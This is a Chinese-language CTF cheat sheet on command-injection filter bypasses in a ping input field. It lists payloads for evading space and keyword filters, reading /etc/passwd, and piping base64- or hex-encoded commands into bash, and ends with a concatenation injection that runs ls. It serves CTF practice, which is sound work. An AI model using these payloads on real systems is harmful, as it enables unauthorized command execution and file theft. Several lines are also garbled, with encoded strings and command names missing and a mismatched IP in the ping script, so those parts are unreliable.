CTFping命令绕过及符号用法
如:在成功地执行一条命令之后再执行另一条命令,或者在一条命令执行失败后再执行另一条命令等。
shell 提供了 && 和 || 来实现命令执行控制的功能,shell 将根据 && 或 || 前面命令的返回值来控制其后面命令的执行。
语法格式如下:
&& [&& …]
命令之间使用 && 连接,实现逻辑与的功能。
只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才会被执行。
只要有一个命令返回假(命令返回值 $? == 1),后面的命令就不会被执行。
“||”符号用法(或)
和&&相反 左边为假才执行命令二
语法格式如下:
|| [|| …]
命令之间使用 || 连接,实现逻辑或的功能。
只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才会被执行。这和 c 语言中的逻辑或语法功能相同,即实现短路逻辑或操作。
只要有一个命令返回真(命令返回值 $? == 0),后面的命令就不会被执行。直到返回真的地方停止执行。
举例,ping命令判断存活主机,注意 &>要连起来写
ping -c 1 -w 1 192.168.1.1 &> /dev/null && result=0 ||result=1 if [ "$result" == 0 ];then echo "192.168.1.1 is UP!" else echo "192.168.2.1 is DOWN!" fi
linux下绕过空格
$IFS
${IFS}
$IFS$1 //$1改成$加其他数字貌似都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
例如
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
ca\t fl\ag
kg=$'\x20flag.txt'&&cat$kg(\x20转换成字符串就是空格,这里通过变量的方式巧妙绕过)
下绕过空格
type.\flag.txt
type,flag.txt
echo,123456
通配符绕过
???在linux里面可以进行代替字母
*在linux里面可以进行模糊匹配
cat flag.* *进行模糊匹配php
代替cat的命令
cat:由第一行开始显示内容,并将所有内容输出
tac:从最后一行倒序显示内容,并将所有内容输出
more:根据窗口大小,一页一页的现实文件内容
less:和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head:只显示头几行
tail:只显示最后几行
nl:类似于cat -n,显示时输出行号
tailf:类似于tail -f
sort%20/flag 读文件
dir来查看当前目录文件
Linux花式读取文件内容
注:目标是获取flag.txt的内容
-sh读取文件:
static-sh ./flag.txt
paste读取文件:
paste ./flag.txt /etc/passwd
diff读取文件 :
diff ./flag.txt /etc/passwd
od读取文件
od -a ./flag.txt
读取文件:
bzmore ./flag.txt
读取文件:
bzless ./flag.txtecho `bzless ./flag.txt`
curl读取文件:
curl file:///home/coffee/flag
编码绕过
:
echo =| -d //打印出来abcde
echo | -d|bash //cat flag.php
echo | -d|sh //cat flag.php
hex编码绕过:
echo 6870 | xxd -r -p|bash //cat flag.ph
编码
$( “\154\163”) //ls
$( “\x63\x61\x74\x20\x66\x6c\x61\x67\x2e\x70\x68\x70”) //cat flag.php
题实例
题目如下
命令执行绕过,过滤一些命令:ls,cat,|,flag等。但是反引号可以执行命令。
通过拼接,可以拼接出来:ls 命令
127.0.0.1;`a="l";b="s";c=$a$b;$c`
可以发现 flag就在下面那个回显里
针对空格过滤,一串字符串中可以使用:
${IFS}